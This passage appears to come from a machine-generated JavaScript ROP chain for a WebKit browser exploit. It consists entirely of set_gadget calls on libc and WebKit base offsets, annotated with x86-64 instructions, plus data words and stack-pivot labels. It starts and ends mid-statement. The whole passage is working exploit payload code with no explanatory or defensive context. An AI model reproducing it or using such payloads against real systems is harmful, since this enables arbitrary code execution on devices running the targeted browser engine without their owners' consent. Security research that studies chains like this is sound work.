; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194008, //L3165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3164: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3166: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+194144, //L3169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194112, //L3167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3167: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3168: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3169: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, 
//cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+194280, //L3171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194296, //L3172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194264, //L3170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+194456, //L3177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194472, //L3178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194408, //L3174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3175: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3176: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3178: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+194584, //L3179+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+194576, //L3179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3179: db([0, 0]); // 0x0 set_gadgets([ ropchain+194600, //L3179+24 ropchain+195952, //L3173 libc_base+764760, //pop rsi ropchain+194640, //L3180 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3180: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3182: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+194760, //L3185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194744, //L3183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3183: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3185: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+194936, //L3188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194952, //L3189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194904, //L3186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194920, //L3187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3186: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3187: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3188: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3189: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195048, //L3191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195032, //L3190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3190: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3192: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3193: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3194: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+195248, //L3196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+195304, //L3197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+195440, //L3201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+195424, //L3200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3199: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3201: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+195560, //L3204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195528, //L3202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L3202: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3204: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195696, //L3206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195712, //L3207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+195680, //L3205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3205: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195856, //L3210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195872, //L3211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195824, //L3208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3209: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3210: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3211: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195944, //L3212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3212: db([0, 0]); // 0x0 //L3173: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196072, //L3215 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196088, //L3216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196056, //L3214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3216: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+196200, //L3218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196248, //L3221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+196216, //L3219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3218: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3219: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3221: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+196360, //L3222+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+196352, //L3222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3222: db([0, 0]); // 0x0 set_gadgets([ ropchain+196376, //L3222+24 ropchain+200688, //L3217 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3223: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3225: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196512, //L3228 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196496, //L3226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+196600, //L3229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196616, //L3231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3232: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+196696, //L3234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3234: db([0, 0]); // 0x0 //L3233: set_gadgets([ libc_base+764760, //pop rsi ropchain+196744, //L3236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3238: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196864, //L3241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196848, //L3239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+197008, //L3244 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196976, //L3242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196992, //L3243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+197088, //L3245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3245: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3247: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+197208, //L3250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197192, //L3248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3248: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3250: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+197384, //L3253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197400, //L3254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197352, //L3251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197368, //L3252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3251: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L3252: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197560, //L3258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197528, //L3256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197544, //L3257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3255: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3257: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3258: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+197648, //L3259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197664, //L3260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3259: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3260: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+197840, //L3262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197856, //L3263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197824, //L3261 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3261: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197968, //L3265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+198016, //L3268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197984, //L3266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3265: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3266: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3268: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+198128, //L3269+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+198120, //L3269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3269: db([0, 0]); // 0x0 set_gadgets([ ropchain+198144, //L3269+24 ropchain+198160, //L3264 libc_base+782311, //pop rsp ropchain+198176, //L3270 //L3264: libc_base+782311, //pop rsp ropchain+200688, //L3271 //L3270: libc_base+764760, //pop rsi ropchain+198216, //L3272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3274: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198336, //L3277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov 
rax, rdi libc_base+764760, //pop rsi ropchain+198320, //L3275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198480, //L3280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198448, //L3278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198464, //L3279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3278: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198560, //L3281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3283: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198680, //L3286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198664, //L3284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198824, //L3289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198792, //L3287 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198808, //L3288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198912, //L3291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3290: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3291: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198968, //L3292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3292: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3294: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+199048, //L3296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3296: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199160, //L3297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3297: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3299: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+199280, //L3302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199264, //L3300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3300: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3302: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199424, //L3305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199392, //L3303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199408, //L3304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3303: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199504, //L3306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3306: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3307: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3308: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+199632, //L3310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+199616, //L3309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3310: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199712, //L3311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3311: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3313: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+199832, //L3316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199816, //L3314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3316: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199912, //L3318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199944, //L3320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3318: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3319: ropchain+200072, //L3317 libc_base+144605 //pop rdi ]); //L3320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200048, //L3322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200064, //L3321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3322: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3321: db([0, 0]); // 0x0 //L3317: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
